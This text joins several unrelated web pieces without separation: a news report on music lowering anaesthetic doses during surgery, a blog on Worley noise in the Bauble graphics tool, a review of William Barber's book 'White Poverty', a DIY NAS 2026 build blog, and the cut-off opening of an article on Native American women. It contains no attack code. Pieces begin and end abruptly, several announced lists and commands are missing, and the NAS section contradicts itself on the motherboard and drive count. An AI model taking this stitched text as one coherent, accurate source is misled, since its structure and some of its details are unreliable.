But the body does not take to surgery easily. Even under anaesthesia, it reacts: heart rate rises, hormones surge, blood pressure spikes. Reducing and managing this cascade is one of the central goals of modern surgical care. Dr Husain explains that the stress response can slow recovery and worsen inflammation, highlighting why careful management is so important.
The stress starts even before the first cut, with intubation - the insertion of a breathing tube into the windpipe.
To do this, the anaesthesiologist uses a laryngoscope to lift the tongue and soft tissues at the base of the throat, obtain a clear view of the vocal cords, and guide the tube into the trachea. It's a routine step in general anaesthesia that keeps the airway open and allows precise control of the patient's breathing while they are unconscious.
"The laryngoscopy and intubation are considered the most stressful response during general anaesthesia," says Dr Sonia Wadhawan, director-professor of anaesthesia and intensive care at Maulana Azad Medical College and supervisor of the study.
"Although the patient is unconscious and will remember nothing, their body still reacts to the stress with changes in heart rate, blood pressure, and stress hormones."
To be sure, the drugs have evolved. The old ether masks have vanished. In their place are intravenous agents - most notably propofol, the hypnotic made infamous by
Michael Jackson's death
but prized in operating theatres for its rapid onset and clean recovery. "Propofol acts within about 12 seconds," notes Dr Goel. "We prefer it for short surgeries like laparoscopic cholecystectomy because it avoids the 'hangover' caused by inhalational gases."
The team of researchers wanted to know whether music could reduce how much propofol and fentanyl (an opioid painkiller) patients required. Less drugs means faster awakening, steadier vital signs and reduced side effects.
So they designed a study. A pilot involving eight patients led to a full 11-month trial of 56 adults, aged roughly 20 to 45, randomly assigned to two groups. All received the same five-drug regimen: a drug that prevents nausea and vomiting, a sedative, fentanyl, propofol and a muscle relaxant. Both groups wore noise-cancelling headphones - but only one heard music.
"We asked patients to select from two calming instrumental pieces - soft flute or piano," says Dr Husain. "The unconscious mind still has areas that remain active. Even if the music isn't explicitly recalled, implicit awareness can lead to beneficial effects."
A pilot involving eight patients led to a full trial of 56 adults randomly assigned to two groups
The results were striking.
Patients exposed to music required lower doses of propofol and fentanyl. They experienced smoother recoveries, lower cortisol or stress-hormone levels and a much better control of blood pressure during the surgery. "Since the ability to hear remains intact under anaesthesia," the researchers write, "music can still shape the brain's internal state."
Clearly, music seemed to quieten the internal storm. "The auditory pathway remains active even when you're unconscious," says Dr Wadhawan. "You may not remember the music, but the brain registers it."
The idea that the mind behind the anaesthetic veil is not entirely silent has long intrigued scientists. Rare cases of "intraoperative awareness" show patients recalling fragments of operating-room conversation.
If the brain is capable of picking up and remembering stressful experiences during surgery - even when a patient is unconscious - then it might also be able to register positive or comforting experiences, like music, even without conscious memory.
"We're only beginning to explore how the unconscious mind responds to non-pharmacological interventions like music," says Dr Husain. "It's a way of humanising the operating room."
Music therapy is not new to medicine; it has long been used in psychiatry, stroke rehabilitation and palliative care. But its entry into the intensely technical, machine-governed world of anaesthesia marks a quiet shift.
If such a simple intervention can reduce drug use and speed recovery - even modestly - it could reshape how hospitals think about surgical wellbeing.
As the research team prepares its next study exploring music-aided sedation, building on earlier findings, one truth is already humming through the data: even when the body is still and the mind asleep, it appears a few gentle notes can help the healing begin.
Worley noise
is a type of noise used for procedural texturing in computer graphics. In its most basic form, it looks like this:
(color r2 (worley q 50 :oversample true))
That’s ugly and boring, but it’s a quick way to see what the effect looks like. If we use Worley noise to distort a 3D shape, we can get something like a hammered or cratered texture:
(def s (osc t 5 | ss 0.2 0.8 * 30 + 10))
(ball 100
| expound (worley p s) (sqrt s)
| slow 0.8
| shade sky
| rotate y (t / 10))
Like many procedural textures, it looks a lot better if you repeat the effect a few times with different frequencies:
(def s (osc t 5 | ss 0.2 0.8 * 30 + 10))
(ball 100
| expound (fbm 3 worley p s) (sqrt s)
| slow 0.8
| shade sky
| rotate y (t / 10))
There are some visual artifacts in these renderings, because they’re using a fast approximation of Worley noise that gives the wrong answer for some values.
To explain these artifacts in more detail, we have to understand a little bit about how Worley noise works.
It’s pretty simple: you start with a grid of points.
When you’re writing a shader, you don’t actually have the ability to generate random numbers, so we’re using a hash function to produce random-
looking
offsets based on the logical position of each point (that is,
$i = [0 0]
for the center point,
$i = [1 0]
for the point to the right of that, etc).
Finally, once you have the points at random-looking positions, you compute the distance to the nearest point for every simple pixel that you sample – and that’s Worley noise.
How do you compute the distance to the nearest point for any pixel you ask about? It’s actually pretty simple: you know that you started with a perfectly even square grid. For any pixel, you can compute the “grid cell” that that pixel falls into (
[0 0]
,
[0 1]
, etc). It’s just the pixel divided by the grid size, rounded to the nearest integer.
And you know that the nearest point is either in this grid, or it’s in one of the immediately adjacent grids, because we only offset our points by
at most
half the grid size, so each randomly distributed point is still inside its original grid cell. Which means there’s no point inside any other cell that could be nearer than any point in one of the adjacent cells.
So that leaves you nine points to check, for every single pixel in your shader. Here’s the optimization that’s causing visual artifacts: instead of checking all nine adjacent cells, only check the current cell and the three cells closest to the point in question. The nearest point to your sample position is
probably
in one of those cells, but it doesn’t
have
to be. So you might get some visual artifacts occasionally.
Nowhere does that code compute cell coordinates or check for the nearest point. I just constructed this
thing
, said
shape/distance
, and somehow that just… gave me the distance to the nearest point.
I was able to do that because
Bauble
is a playground for making 3D graphics with
signed distance functions
. Bauble’s
whole deal
is computing distances to things! And Worley noise is just the signed distance function of a bunch of randomly distributed points. I’m used to thinking of signed distance functions as defining implicit surfaces of 3D shapes, but Worley noise uses the distance as a scalar in its own right.
So.
This is interesting.
What if… we took
other
signed distance functions, and used them as procedural noise distortions?
We’ll start simple. Instead of points, what if we randomly distribute a bunch of squares?
It’s a lot harder to visualize the distance field in 3D. What you’re seeing there is the distance field at the plane that passes through the origin and faces towards the camera. I know it’s not a great visualization, but the point is that this technique generalizes to 3D (even if it’s hard to imagine the distance field at every point in 3D space).
Let’s see how this looks when we use it to distort a 3D shape:
I think it’s kind of more interesting without the randomization.
We’ve constructed an interesting 3D noise function, and we’re using it to distort 3D space. But of course, we can go back to considering this a “noise texture” in the original sense of the word:
The point of all of this is: Worley noise invites us to reconsider signed distance functions as more than implicit surfaces. And since Bauble makes it easy to construct signed distance functions, it’s a good playground for experimenting with textures like this.
Even if we never found anything particularly attractive, it’s fun to play around with space.
If this is your first time seeing
Bauble
, hey welcome! This post is an expansion of something
I briefly talked about in a YouTube video once
. The video has many more examples of the sorts of things that Bauble can do. Check it out if this piqued your interest!
White Poverty
How Exposing Myths About Race and Class Can Reconstruct American Democracy
Liveright
William J. Barber II with Jonathan Wilson-Hartgrove
ISBN: 978-1-324-09675-7
For
progressives
to win, we need a powerful multiracial coalition. That includes the people of color who disproportionately suffer
poverty
and structural violence, but it also includes the white people who make up the largest share of poor people in this country.
As the Reverend Dr.
William J. Barber
II points out in his new book,
White Poverty
, there are more poor white people than any other racial group, and more effort should be put into pulling them into this coalition.
I’m a white man from a wealthy family—and a lawyer who took on tough
civil rights
cases and fought them as if my life depended on it. My goal from the beginning was to join those who are trying to make America a better place—a country where
racism
and sexism would slowly fade away and where the possibility of equal opportunity would shine through.
I see that road forward in Rev. Barber’s new book, co-written with Jonathan Wilson-Hartgrove.
White Poverty
‘s great value is to teach and motivate both Black and white leaders to create a multiracial movement which demands legislation that benefits
all
poor people.
Talking to white people in all walks of life—from taxi drivers to restaurant workers as well as bankers and stockbrokers—has been very revealing. When I say I’m a civil rights lawyer, their voices often take on a certain unsympathetic tone—and many times they inject the “Black crime rate” into the conversation. Sometimes the person will shift the conversation to discuss Black children being raised by single women who use food stamps to put food on the table or who benefit from other welfare programs.
As Barber points out, there are “more than twice as many poor white people as there are poor Black people in this nation.” But if I mention that, the person sometimes appears not to hear me, or lets me know in no uncertain terms that it’s Black people themselves who are at fault for their poverty—and they should look to their own lives rather than blame whites. The government taxes “us,” I’m often told, to give “them” a free ride.
When I hear this, I know there’s something major missing.
De-racializing Poverty
I’ve been encouraged by the many articles, books, and memoirs that have been written about
racial justice
since the protests over George Floyd’s murder, but few suggest an effective way forward.
For example, a new book by Kellie Carter Jackson,
We Refuse: A Forceful History of Black Resistance
(Seal Press, 2024), highlights how Black women fought back against racism, some with weapons, some without, but none took the path that Reverend Barber takes in
White Poverty
. Reverend Barber, by contrast, argues that Blacks and whites must join together to address their common needs.
Another prominent civil rights advocate, Heather McGhee, traveled across America to write
The Sum of Us: What Racism Costs Everyone and How We Can Prosper Together
(One World, 2021), which documents how some progressives were beginning to engage in cross-racial solidarity through collective action to achieve higher wages and benefits for working people.
As Barber points out, the political establishment invariably markets itself to the needs of “the middle class” and ignores the poor, and whites especially look the other way.
In effect, Barber’s
White Poverty
builds upon McGhee’s book. It’s the work of a man of action to not only test cross-racial solidarity, but to put that theory into action. Barber lays it on the line in his very first sentence: “This is a book by a Black man about white poverty in America.” That initial signal points to where he is headed.
As a lifelong civil rights lawyer, I find that his signal resonates. As Barber persuasively argues, the public and the country’s legislatures—federal, state, and local—accept the myth that poverty is only a Black issue, as do the people I talk to daily. They view poverty through this lens to the detriment of Black and white people alike, as well as people of all other colors and races.
As Barber points out, the political establishment invariably markets itself to the needs of “the middle class” and ignores the poor, and whites especially look the other way. The same is true even in our country’s religious establishments. Barber notes that “a Pew Research Center study of nearly 50,000 sermons found that neither the words ‘poverty’ nor ‘poor’ register as commonly used in American pulpits.”
A Multiracial Fusion Movement
Much of
White Poverty
concerns the history of how American racism came into being and how the myths evolved around it. Barber explains how the manipulation of these myths has preserved the power of white elites, who use their political and economic power to downgrade the needs of poor white people as well as Black people, while benefiting the wealthy.
To this reader then,
White Poverty
‘s great value is to teach and motivate both Black and white leaders to create a multiracial movement which demands legislation that benefits
all
poor people. As an additional benefit,
White Poverty
gives examples of Black and white movements fusing themselves together.
Not least, Barber has spent a huge amount of energy over the past seven years in building a multiracial
Poor People’s Campaign
. Co-chaired by Rev. Barber along with Rev. Liz Theoharis of the Kairos Center, the Poor People’s Campaign has thousands in the field to help poor white and poor Black communities understand each others’ community needs and the advantages of working together to fight against “policy violence” and to turn out the vote.
This beautifully written book offers a road map to the powerful multiracial organizing that can turn this country around, lift up poor people, and deepen our democracy.
In the last election for governor in
Kentucky
, the campaign and its allies worked with both white and Black rural communities to get out the vote. The result was an upset in electing the state’s present governor, Democrat Andy Beshear. In rural counties, an enlarged electorate turned out to vote and that tipped the election.
The Poor People’s Campaign has built durable alliances with other organizations to advance its multiracial vision. It’s currently collaborating with the AFL-CIO on voter engagement. It pursues legal challenges with Forward Justice. It coordinates actions with national Christian and Jewish organizations. With the Institute for Policy Studies, on whose board I serve, it has produced the data and the analysis to back up its bold agenda.
Barber is a man of the cloth who takes his
religion
seriously. As a result, the book is sprinkled with words from other religious figures who offer moral reasons for organizing poor people to struggle for their needs nonviolently but willing to cross police lines and stand up to authority.
In short, this beautifully written book offers a road map to the powerful multiracial organizing that can turn this country around, lift up poor people, and deepen our democracy.
Lewis M. Steel is a former senior counsel at Outten & Golden LLP and an Institute for Policy Studies board member. He's the author of The Butler's Child: White Privilege, Race, and a Lawyer's Life in Civil Rights
Fourteen years ago, my storage needs outpaced my capacity and I began to look into building a network attached storage server. I had a few criteria in mind and was curious to see if anyone had _ recently_ shared something similar, but I couldn’t find anything that was relevant.
In fact, I found that the communities I was looking for answers in were actively hostile towards what I wanted to do. This resulted in my decision
to build my own DIY NAS
and share that as one of my very first blogs.
Much to my surprise, people were very interested in that blog! Ever since, I’ve been building a similar DIY NAS machine almost every year trying to satisfy the curiosity of other prospective DIY NAS builders.
Here are those criteria:
Small form factor
: It’s not the case for me any more, but at the time the space was limited in my office. I always assume that space in everybody’s office is limited. As a result, I want my DIY NAS builds to occupy as little of that office space as I can.
At least six drive bays
: Back when I built my NAS, it took about four drives’ worth of storage to meet my storage needs. Plus I desired two empty drive bays for future use. However, in the years since hard drive capacities have increased dramatically. At some point in the future, I may reduce this to four drive bays.
An integrated, low power CPU
: I intend my DIY NAS to run 24 hours a day, 7 days a week, and 52 weeks a year. When it comes to power consumption, that can do some damage on your electric bill! Thankfully our electricity here isn’t as expensive as others’ in the United States, or even further outside its borders, but I try and keep power consumption in mind when picking components for a DIY NAS build.
Homelab potential
: It does not take up a lot of CPU horsepower for a NAS to serve up files, which means that on modern hardware there’s a lot of untapped potential in a DIY NAS for virtual machines or containers to self-host services.
It’s important to remember that
these are my criteria
, and not necessarily yours. Every DIY NAS builder should be making their own list of criteria and reconcile all of their component purchases against the criteria that’s important to them.
Is it even a good time to build a NAS?
As I prepared to build this NAS, component prices disappointed me. Hard drives, SSDs, and RAM prices were all rising. Based on what I’ve been told, I expect Intel CPU prices to increase as well. My contact at Topton has been encouraging me to stock up on motherboards while they still have some in inventory. Based on what’s been explained to me, I expect the motherboard’s prices to rise and for their availability to potentially dwindle.
In short, the economy sucks and the price of DIY NAS components is a pretty good reflection of just how sucky things are becoming. I briefly considered not publishing a DIY NAS build this year hoping that things would improve a few months down the road. But then I asked myself, “What if it’s even worse in a few months?”
I sure hope things get better, but I fear and expect that they’ll get worse.
Motherboard and CPU
I built
my first DIY NAS with a Topton motherboard in 2023
. Each DIY NAS since then has also featured a Topton motherboard. My only complaint about the motherboards has been that buying them from one of the Chinese e-tail sites like AliExpress is considered problematic by some. With every DIY NAS build, I try and go through all the motherboards that I can find while searching for something with a better value proposition, but for each of the past three years I’ve landed on the latest offering from Topton.
For the
DIY NAS: 2026 Edition
, I chose the
Topton N22 motherboard
with the
Intel Core 3 N355
CPU. The motherboard is similar to last year’s
Topton N18
but has incrementally more compelling features, particularly the extra 2 SATA ports, the PCI-e x1 slot, and the N355 CPU!
I opted for the motherboard with the
Intel Core 3 N355
CPU. This makes the server a more capable homelab machine than prior years’ DIY NAS builds. The extra cores and threads come in handy for streaming media, replacing your cloud storage, facilitating home automation, hosting game servers, etc.
Case
Just like Topton has been making great motherboards for DIY NAS machines, JONSBO has been steadily releasing great cases for DIY NAS machines. This year SilverStone Technology released a new case, the
CS383
(
specs
) which I was
very interested
in buying one for the
DIY NAS: 2026 Edition
. Unfortunately it carries a pretty hefty price tag to go along with all of its incredible features!
The
JONSBO N4
(
specs
) is a third the price, adheres to my “smaller footprint” criteria, and it is rather impressive on its own. It’s a
tiny
bit larger case than last year’s DIY NAS, but I really like that it has drive bays for six 3.5” drives and two 2.5” drives.
Although, it’s peculiar in that two of the 3.5” drive bays (and the two 2.5” drive bays) aren’t attached to a SATA backplane and can’t be swapped anywhere as easily as the other four 3.5” bays. However, this peculiar decision seems to have caused the JONSBO N4 to sell for a bit less ($20-$40) than similar offerings from JONSBO. At its price, it’s a compelling value proposition!
Case Fan
In the past, I’ve found that the fans which come with JONSBO cases are too noisy. They’ve been noisy for two reasons; the design quality of the fans make them loud. And the fans are constantly running at their top speed because of the fan header they’re plugged into on the cases’ SATA backplanes.
I anticipated that fan efficiency and noise would be a problem, so I picked out the
Noctua NF-A12x25 PWM
to solve it. Firstly, swapping in a high-quality fan that pushes more air
and
generates less noise–especially at its top speed–is a good first step. Secondly, I’d address the problem by plugging the fan into the motherboard’s
SYS_FAN
header instead of on the SATA backplane. This provides the opportunity to tune the fan’s RPMs directly in the BIOS and generate far less noise.
RAM
The first time I first asked myself, “Should I even build the
DIY NAS: 2026 Edition
?” came as I was checking prices on DDR5 memory. Thankfully for me I had leftover RAM after purchasing DDR5 4800MHz SODIMMs for the
DIY NAS: 2025 Edition
,
the Pocket Mini NAS
, and then again for the
DIY NAS that I built and gave away at 2025’s Texas Linux Fest
. I was personally thankful that I had one brand new 32GB DDR5 4800MHz SODIMM laying around, but I was wildly disappointed for everybody who will try and follow this build when I saw the price of those same SODIMMs.
Regardless, I felt a
Crucial 32GB DDR5 4800MHz SODIMM
(
specs
) was the right amount of RAM to get started with for a DIY NAS build in 2025. Whether you just need storage or you wish to also host virtual machines, you will benefit from having more than the bare minimum recommendation of RAM. I really wanted to buy a
48GB DDR5 4800MHZ SODIMM
for this DIY NAS build, but I couldn’t talk myself into spending the $250-$300 that it would’ve wound up costing.
Storage
A quick disclaimer about all the drives that I purchased for the
DIY NAS: 2026 Edition
, I already had all of them! I tend to buy things when I see them on sale and as a result, I have a collection of brand new parts for machines in my homelab or for upcoming projects. I raided that collection of spare parts for the
DIY NAS: 2026 Edition
.
Boot Drive
If you ranked the drives in your DIY NAS in order of importance, the boot drive should be the least-important drive. That is
not
saying that boot drive isn’t performing an important function, but I am suggesting that you shouldn’t invest a bunch of energy and money into picking the optimal boot drive.
Because the
JONSBO N4
has a pair of 2.5” drive bays, I decided that a 2.5” SATA SSD would be ideal for the boot drives. As a rule of thumb, I try and spend less than $30 per boot drive in my DIY NAS builds.
Ultimately I selected a pair of
128GB Silicon Power A55 SSDs
(
specs
). I’ve used these before, I’d use them again in the future, and I even have four of their higher capacity (1TB) SSDs in a pool in my own NAS.
App and Virtual Machine NVMe SSDs
Self-hosting apps and virtual machines on your DIY NAS has really exploded in the past few years. The developers of NAS appliance packages have made it much easier and the self-hosted products themselves have become as good–or often better–than things you’re probably subscribing to today. Because of that, I saved the highest-performing storage options on the
Topton N22 motherboard
for apps and VMs.
However, it’s important to point out that these M.2 slots are PCI-e version 3 and capped at a single PCI-e lane. This is a consequence of the limited number of PCI-e lanes available for each of the CPU options available for the
Topton N22 motherboard
(N100, N150, N305, and N355).
Thanks to rising prices, I opted to do like I’ve done with past DIY NAS builds and skip buying hard drives for the
DIY NAS: 2026 Edition
.
When planning your DIY NAS, it is good to always remember that
storage will ultimately be your costliest and most important expense
.
Here’s a few things to consider when buying hard drives:
Determine your hardware redundancy preferences. I recommend having two hard disk drives’ worth of redundancy (RAIDZ2, RAID6, etc.)
Focus on price-per-terabyte when comparing prices of drives.
Do some
burn in testing
of your hard drives before putting them to use.
When buying new drives of the same model, try and buy them from multiple vendors to increase the chances of buying drives manufactured in separate batches.
Plan Ahead! Understand the rate that your storage grows so that you can craft a strategy to grow your storage down the road.
Being cheap today can and will paint you into a corner that’s quite expensive to get out of.
Understand that RAID is not a backup!
Thankfully, I’ve collected a bunch of my own decomissioned hard drives which I used to thoroughly test this DIY NAS build.
SATA Cables
One of the under-the-radar features of the
Topton N22 motherboard
might be one of my favorite features! The motherboard’s Asmedia ASM1164 SATA controllers sit behind two SFF-8643 connectors. These connectors provide two advantages for these motherboards:
The one thing that I have routinely disliked about building small form factor DIY NAS machines is the price tag that accompanies a small form factor power supply (SFX) like is required with the
JONSBO N4
.
Regardless of whether it was called FreeNAS, TrueNAS, TrueNAS CORE, TrueNAS SCALE, or now
TrueNAS Community Edition
, the storage appliance product(s) from iXSystems have always been my go-to choice. For each yearly DIY NAS build, I wander over to the
TrueNAS Software Status page
and look at the state of the current builds.
I’m conservative with my personal NAS setup. However, for these blog builds, I typically choose Early Adopter releases. This year that’s
TrueNAS 25.10.0.1 (aka Goldeye)
. I enjoy being able to use these DIY NAS builds as a preview to the latest and greatest that TrueNAS has to offer.
I repeatedly choose TrueNAS because it’s what I’ve become accustomed to; it’s legitimately an enterprise-grade storage product, which is exactly the quality of solution that I want my data to depend on. At the same time it does not feel like you need a specialized certification and a truckload of enterprise storage experience to meet set up a NAS that exceeds your needs at home.
Many times I have been asked, “Why not
<insert NAS appliance or OS here>
?” My answer to that question is, TrueNAS has always done everything that I need it to and they haven’t given me any reason to consider anything else. As a result, there’s never been a need for me to evaluate something else.
Hardware Assembly, BIOS Configuration, and Burn-In
Hardware Assembly
I wanted the smallest possible DIY NAS. The
JONSBO N4
case initially felt too large since it accommodates Micro ATX motherboards. However, I grew to accept its slightly larger footprint. However, putting the
Topton N22 motherboard
into the case felt roomy and luxurious. Building the
DIY NAS: 2026 Edition
compared to prior years’ felt a lot like coming home to put on sweatpants and a t-shirt after wearing a suit and tie all day long.
I wasn’t too fond of the cable-management of the power supply’s cables. The layout of the case pretty much makes the front of the power supply inaccessible once it is installed. One consequence of this is that the power cable which powered the SATA backplane initially prevented the 120mm case fan from spinning up. That issue was relatively minor and was resolved with zip ties.
Overall, I felt pretty good about the assembly of the
DIY NAS: 2026 Edition
, but things would take a turn for the worse when I decided to fill all the 3.5-inch drive bays up with some of my decommissioned 8TB HDDs. Now this is probably my fault, I wouldn’t be surprised at all that the manual of the
JONSBO N4
warned me against this, but putting the drives in last turned out to be a major pain in the neck for each of the four drive bays
without
a SATA backplane.
I had wrongly guessed that you accessed those drives’ power and data ports from the front of the case. I worked really hard to route the cables and even managed to install all of the drives before realizing my error and learning my lesson. I’m understanding now why the
JONSBO N4
is cheaper than all of its siblings. Partly because there’s a missing SATA backplane, but also because those other 4 drive bays’ layout is frustrating.
Don’t let my last couple paragraphs sour you on the
JONSBO N4
, though. I still really like its size, it feels big when you’re working in it with a Mini ITX motherboard. If you wind up deciding to use the JONSBO N4, then I suggest that you put those four drives and their cables in first before you do anything else. That would’ve made a world of difference for me. Actually looking at the documentation before getting started might have saved me quite a bit of aggravation, too!
If I have ruined the JONSBO N4 for you, then check out the
JONSBO N3
. It’s
eight
3.5-inch drive bays pair up really nicely with the
Topton N22 motherboard
. You can see what I thought of the JONSBO N3 by reading the
DIY NAS: 2024 Edition
blog.
BIOS Configuration
Generally speaking, I do as little as I possibly can in the BIOS. Normally I strive to only set the time and change the boot order. However, I did a bit more for the
DIY NAS: 2026 Edition
since I’m using the
SYS_FAN
header for the fan which is responsible for cooling the hard drives. Here are the changes that I made in the BIOS:
Set the
System Date
and
System Time
to Greenwich Mean Time
Advanced
Hardware Monitor ( Advanced)
Set
SYS SmartFan Mode
to
Disabled
.
Set the
Manual PWM Setting
(for
SYS_FAN
) to 180.
Set
PWRON After Power Loss
to
Always On
Boot
Set
Boot Option #1
to the TrueNAS boot device.
I’m not at all interested in venturing into the rabbit’s hole of trying to completely minimize how much power the NAS uses. However, I imagine there’s some opportunities for power savings lurking in the BIOS. I didn’t go looking for them myself, but if you’re intrepid enough to do so here’s a few suggestions that I have to save some additional power:
Disable the onboard audio.
Disable any network interfaces that you don’t wind up using.
Tinker with the CPU settings.
Got other suggestions?
Share them in the comments!
Burn-In
Because all of the hardware is brand-new to me brand-new components are not guaranteed to be free of defects, I always do a little bit of burn-in testing to establish some trust in the hardware that I’ve picked out for each DIY NAS build. While I think doing
some
burn-in testing critically important, I also think the value of subsequent burn-in testing drops the more that you do. Don’t get too carried away and do your own burn-in testing in moderation!
I
always
use Memtest86+ to burn-in the RAM. I always run at least 3+ passes of Memtest86+. Typically, I run many more passes because I tend to let the system keep running additional passes overnight. Secondarily, running these many passes give the CPU a little bit of work to do and there’s enough information displayed by Memtest86+ to give me confidence in the CPU and its settings.
Hard Drives
The failure rate of hard drives is highest when the drives are new and then again when they’re old. Regardless of type of hard drives that I buy or when I buy them, I always do some disk burn in. I tend to run
Spearfoot’s Disk Burn-in and Testing script
on all of my new drives. However executing this script against all of the drives can take quite a long time, even if you use something like
tmux
to run the tests in parallel.
Initial TrueNAS CE Setup
There’s always a little bit of setup that I do for a new TrueNAS machine. This isn’t intended to be an all inclusive step-by-step guide for all the things you should do with your DIY NAS. Instead, it’s more of a list of things I kept track of while I made sure that the
DIY NAS: 2026 Edition
was functional enough for me to finish writing this blog. That being said, I do think your NAS would be rather functional if you decided to do the same configuration.
Updated the hostname to
diynas2026
Note: This is only to avoid issues with another NAS on my network.
Updated the timezone.
Enabled the following services and set them to start automatically.
SMB
SSH
NFS
Enabled password login for the
truenas_admin
user.
Note: If I were planning to use this DIY NAS long-term, I wouldn’t have done this. Using SSH keys for authentication is a better idea
.
Edited the TrueNAS Dashboard widgets to reflect the 10Gb interface (
enp1s0
).
Created a pool named
rust
which consisted of a single RAID-Z2 vdev using eight hard drives that I had sitting on my shelf after they were decomissioned.
Configured the Apps to use the
flash
pool for the apps’ dataset.
Made sure that the System Dataset Pool was set to
flash
.
Confirmed that there were Scrub Tasks set up for the
flash
and
rust
pools.
Created a dataset on each pool for testing;
flash-test
and
rust-test
Installed the
Scrutiny
app found in the App Catalog.
If I were planning to keep this NAS and use it for my own purposes, I would also:
As the NAS is seeded with data, create and maintain a suite of
snapshot tasks
tailored to the importance of the different data being stored on the NAS.
Set up S.M.A.R.T. tests for all of the drives:
Weekly Short Test
Monthly Long Test
Benchmarks
Just about every year, I benchmark each DIY NAS build and almost always come to the same conclusion; the NAS will outperform your network at home. Your first bottleneck is almost always going to be the network and the overlwhelming majority of us have gigabit networks at home–but that’s slowly changing since 2.5Gbps and 10Gbps network hardware has started to get reasonable lately.
Even though I always come to the same conclusion, I still like to do the benchmarks for two reasons:
It helps me build confidence that the
DIY NAS: 2026 Edition
works well.
People tend to enjoy consuming benchmarks
and
it’s fun for me to see the DIY NAS’ network card get saturated during the testing.
Throughput
I like to do three categories of tests to measure the throughput of the NAS:
Use
iperf3
to benchmark throughput between my NAS and another machine on my network.
Benchmark the throughput of the pool(s) locally on the NAS using
fio
.
Set up SMB shares on each of the pools and then benchmark the throughput when using those shares.
What do I think these benchmarks and my use of the
DIY NAS: 2026 Edition
tell me? In the grand scheme of things, not a whole lot.
However, these benchmarks do back up what I expected, the
DIY NAS: 2026 Edition
is quite capable and more than ready to meet my storage needs. I especially like that the CrystalDiskMark benchmark of the SMB shares were
both faster than a SATA SSD
, and the throughput to the share on the
flash
pool practically saturated the NAS’ 10GbE network connection.
FIO Tests
Every time I benchmark a NAS, I seem to either be refining what I tried in prior years or completely reinventing the wheel. As a result, I wouldn’t recommend comparing these results with results that I shared in prior years’ DIY NAS build blogs. I haven’t really put a ton of effort into developing a standard suite of benchmarks. Things in my homelab change enough between DIY NAS blogs that trying to create and maintain an environment for a standard suite of benchmarks is beyond what my budget, spare time, and attention span will allow.
I’m going to paste these
fio
commands here in the blog for my own use in future DIY NAS build blogs. If you wind up building something similar, these
might
be helpful to measure your new NAS’ filesystem’s performance and compare it to mine!
One not-so-obvious cost of running a DIY NAS is how much power it consumes. While I specifically tried to pick items that were efficient in terms of power consumption, it’s also important to realize that all the other bells and whistles on the awesome
Topton N18 NAS motherboard
consume power, too. And that the biggest consumer of power in a NAS is almost always the hard disk drives.
Thanks to my tinkering with
home automation
, I have a plethora of
smart outlets
which are capable of power monitoring. I used those smart outlets for most of my power monitoring. But I also have a
Kill a Watt P400
that I also use for some of the shorter tests:
Power consumed during a handful of specific tasks:
Idle while running TrueNAS
RAM Burn-in (~14 passes of Memtest86+)
An 8-hour throughput benchmark copying randomly-sized files to the NAS using SMB.
Total consumed during the build, burn-in, and use of the
DIY NAS: 2026 Edition
.
Task
Duration
Max Wattage
Avg. Wattage
Total Consumption
Boot
10 min.
200.00 W
120.00 W
0.02 kWh
Idle
3 hr.
90.00 W
66.67 W
0.20 kWh
RAM Burn-in
18 hr.
104.00 W
91.67 W
1.65 kWh
SMB Benchmark of HDDs
8 hr.
107.00 W
85.00 W
0.68 kWh
Total
108 hr.
237.80 W
66.49 W
7.17 kWh
What about an EconoNAS?
Shortly before prices skyrocketed, I decided I wasn’t very interested in doing a separate EconoNAS builds. Several months ago, I realized that there were several off-the-shelf NAS machines that were more-than-capable of running TrueNAS and they were selling at economical prices that couldn’t be topped by a DIY approach. I will dive deeper into this in a future blog, eventually …
maybe
?
All that being said–it’d be incredibly easy to make some compromises which result in the
DIY NAS: 2026 Edition
becoming quite a bit more economical. Here’s a list of changes that I would consider to be more budget-friendly:
Altogether, these savings could add up to more than $400, which is pretty considerable! If you made all of these changes, you’d have something that’s going to be nearly equivalent to the
DIY NAS: 2026 Edition
but at a fraction of the price.
What am I going to do with the DIY NAS: 2026 Edition?!
My DIY NAS is aging quite gracefully, but I’ve recently been wondering about replacing it. Shortly before ordering all the parts for the
DIY NAS: 2026 Edition
, I briefly considered using this year’s DIY NAS build to replace my personal NAS. However, I decided not to do that. Then prices skyrocketed and I shelved the idea of building a replacement for my own NAS and I nearly shelved the idea of a DIY NAS in 2026!
So that begs the question, “What is Brian going to do with the
DIY NAS: 2026 Edition
?”
I’m going to auction it off on the
briancmosesdotcom store on eBay
! Shortly after publishing this blog, I’ll list it on eBay. In response to skyrocketing prices for PC components, I’m going to do a no-reserve auction. At the end of the auction, the highest bidder wins and hopefully they’ll get a pretty good deal!
Final Thoughts
Overall, I’m pleased with the
DIY NAS: 2026 Edition
. The
Topton N22 motherboard
is a significant improvement over last year’s
Topton N18 motherboard
, primarily due to its extra two SATA ports. This provides 33.3% more gross storage capacity.
While testing, I found the
Intel Core 3 N355 CPU
somewhat excessive for basic NAS functions. However, the substantial untapped CPU horsepower offers luxurious performance potential. This makes the build compelling for anyone planning extensive self-hosting projects.
I have mixed feelings about the
JONSBO N4 case
. The four right-side drive bays lack SATA backplane connectivity. Without creative cabling solutions, individual drive replacement becomes challenging. However, the case’s ~$125 price point compensates for this inconvenience. I anticipate that those the cost savings will justify the compromise for most builders. If I were to build the
DIY NAS: 2026 Edition
all over again, I’d be tempted to use the
JONSBO N3 case
or even the
JONSBO N6
which isn’t quite obtainable, yet.
The DIY NAS: 2026 Edition delivers excellent performance and superior specifications. In my opinion, it represents better value than off-the-shelf alternatives:
Building your own NAS provides significant advantages. Years later, you can upgrade RAM, motherboard, case, or add PCI-e (x1) expansion cards. These off-the-shelf alternatives offer severely limited upgrade paths.
tories about Native American women have long lingered in the shadows. Even accounts of well-known figures like Pocahontas are misunderstood. In fact, “Pocahontas” wasn’t even her real name.
Lesser known to history are women like Susan La Flesche Picotte, who went to medical school to treat her people, Buffalo Calf Road Woman, who knocked George Armstrong Custer off his horse, and Wilma Mankiller, who became the first female Principal Chief of the Cherokee Nation.
Facing oppression, racism, and sexism, the nine Native American women featured below fought to make the world a better place. They didn’t always succeed — but they did help clear a path for the generations that followed.
Susan La Flesche Picotte: The First Native American Woman To Receive A Medical Degree
Susan La Flesche Picotte became one of the few women of her day to go to medical school. (Photo in the public domain)
When Susan La Flesche Picotte was a girl, her father
asked
her and her sisters: “Do you always want to be simply called those Indians or do you want to go to school and be somebody in the world?”
Born to the Omaha people in 1865, La Flesche Picotte grew up in a world full of fracturing tribal traditions. Her father led one faction of the tribe, which believed that the Omaha needed to start accepting some white customs. The other faction, led by medicine men and traditionalists, called their rivals’ log cabins “The Village of the Make-Believe White Men.”
